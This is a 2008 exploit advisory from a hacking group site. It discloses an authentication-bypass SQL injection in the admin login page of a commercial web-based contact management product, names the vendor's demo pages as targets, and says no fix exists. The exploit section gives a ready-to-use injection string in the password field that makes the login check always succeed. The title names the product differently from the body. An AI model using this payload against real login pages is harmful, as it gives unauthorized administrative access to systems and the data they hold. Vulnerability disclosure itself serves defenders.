Rae Media Contact MS (Auth Bypass) SQL Injection Vulnerability

2008-12-03 19:09:20

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                                        +
+ Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability +
+                                                                        +
+                          Discovered by b3hz4d                          +
+                                                                        +
+                          WwW.DeltaHacking.Net                          +
+                                                                        +
+                                                                        +
+                                                                        +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


APA Center of Yazd University
(https://www.ircert.cc)


AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 03 Dec 2008
SITE : WwW.DeltaHacking.Net
CONTACT: [email protected]

#####################################################

APPLICATION : Web Based Contact Management
DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm
VENDOR : http://www.aliensoftcorp.com/
DEMO : http://www.aliensoftcorp.com/contactmanager.htm

#####################################################


[+] vuln :

Admin login page

All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable.

All Demo links are here:

http://www.aliensoftcorp.com/contactmanager.htm

[+] Exploit :
USER: anything

PASS: delta' or 'a'='a


###########################################################################################################
# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all members of DeltaHacking.Net & Snoop-Security.Com #
###########################################################################################################


Fixes

No fixes
